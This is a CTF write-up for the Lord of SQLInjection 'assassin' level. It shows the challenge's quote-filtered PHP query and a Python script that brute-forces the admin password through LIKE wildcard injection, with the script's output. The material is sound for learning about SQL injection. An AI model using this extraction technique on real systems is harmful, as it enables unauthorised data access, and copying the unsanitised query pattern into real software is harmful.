LOS Lv.15 assassin
assassin
1
2
3
4
5
6
7
8
9
10
11
12
13
14
query : select id from prob_assassin where pw like ''
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/\'/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_assassin where pw like '{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
if($result['id'] == 'admin') solve("assassin");
highlight_file(__FILE__);
?>
Solution
1
2
3
4
5
6
7
따옴표가 필터링 되어있음.
이 문제는 어느정도의 유추가 필요함.
문제의 해결 조건은 admin으로 로그인이 아닌 admin 아이디만 불러오면 됨.
이 점을 유의하여 풀어야 함.
쿼리문에 like 연산자를 사용하므로 와일드카드를 이용하여 풀꺼임.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import requests
import sys
url='https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php'
headers={'Content-Type':'application/x-www-form-urlencoded'}
cookies={'PHPSESSID':'[redacted]'}
pw=''
for i in range(1,9) :
for j in range(48,123) :
payload={'pw':pw+chr(j)+'%'}
res=requests.get(url,headers=headers, params=payload, cookies=cookies)
if "Hello admin" in res.text :
print("pw : "+pw+chr(j)+'%')
print("Assassin Clear!")
sys.exit(0)
if "Hello guest" in res.text :
pw+=chr(j)
print("pw : "+pw)
break
1
2
3
4
pw : 9
pw : 90
pw : 902%
Assassin Clear!
This post is licensed under CC BY 4.0 by the author.